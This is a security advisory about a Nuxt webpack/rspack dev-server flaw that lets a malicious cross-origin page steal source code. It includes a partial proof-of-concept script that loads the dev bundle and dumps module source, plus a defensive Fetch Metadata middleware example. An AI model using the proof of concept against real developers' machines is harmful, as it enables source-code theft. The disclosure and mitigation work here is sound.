Insecure service configuration in @nuxt/rspack-builder
Description
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Summary
Source code may be stolen during development if you use the webpack / rspack builder and open a malicious website.
Details
Because a request for a classic script made by a script tag is not subject to the same-origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
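The cross-origin script load described above can be recognised on the server from the Fetch Metadata headers that browsers attach to it. The following is an added example, not code from this advisory or from Nuxt: a connect-style middleware that refuses such loads. The function names and the '/_nuxt/' prefix check are assumptions, and requests that carry no Sec-Fetch-* headers are left alone.

```javascript
// Added example, not Nuxt's own code. Sec-Fetch-* are standard request headers;
// the function names and the '/_nuxt/' prefix (from the PoC URL) are assumptions.
const PROTECTED_PREFIX = '/_nuxt/'

// Returns true when the request is a classic <script>-style load
// (mode "no-cors") started by a page from another origin.
function isCrossOriginNoCorsLoad(req) {
  const url = req.url || ''
  if (!url.startsWith(PROTECTED_PREFIX)) return false

  const headers = req.headers || {} // Node lower-cases header names
  const site = headers['sec-fetch-site']
  const mode = headers['sec-fetch-mode']

  // Non-browser clients, and browsers talking to a non-trustworthy URL
  // (plain http on a LAN address), send no Fetch Metadata: not classifiable.
  if (site === undefined || mode === undefined) return false

  // "same-origin": the dev app loading its own bundle.
  // "none": the developer opened the URL directly.
  if (site === 'same-origin' || site === 'none') return false

  // CORS-mode requests stay subject to the server's CORS policy; no-cors
  // script loads are the ones the same-origin policy does not stop.
  return mode === 'no-cors'
}

// Connect-style middleware: answer 403 before the bundle is served.
function blockCrossOriginScriptLoads(req, res, next) {
  if (isCrossOriginNoCorsLoad(req)) {
    res.statusCode = 403
    res.end('Cross-origin no-cors request blocked')
    return
  }
  next()
}

// Constructed sample requests (header values as a browser would send them).
const samples = {
  ownPage: { url: '/_nuxt/app.js', headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'no-cors' } },
  otherSite: { url: '/_nuxt/app.js', headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors' } },
  addressBar: { url: '/_nuxt/app.js', headers: { 'sec-fetch-site': 'none', 'sec-fetch-mode': 'navigate' } },
  curl: { url: '/_nuxt/app.js', headers: {} },
}

for (const [name, req] of Object.entries(samples)) {
  console.log(name, isCrossOriginNoCorsLoad(req) ? 'blocked' : 'allowed')
}
```

Because the check fails open when the headers are absent, it complements rather than replaces updating to a patched builder version.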
PoC
Create a Nuxt project with the webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a website that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)
    for (const key in moduleList) {...
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).
Impact
Users of the webpack / rspack builder may have their source code stolen by malicious websites.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
npm | 3.15.3 | ||
npm | 3.15.3 |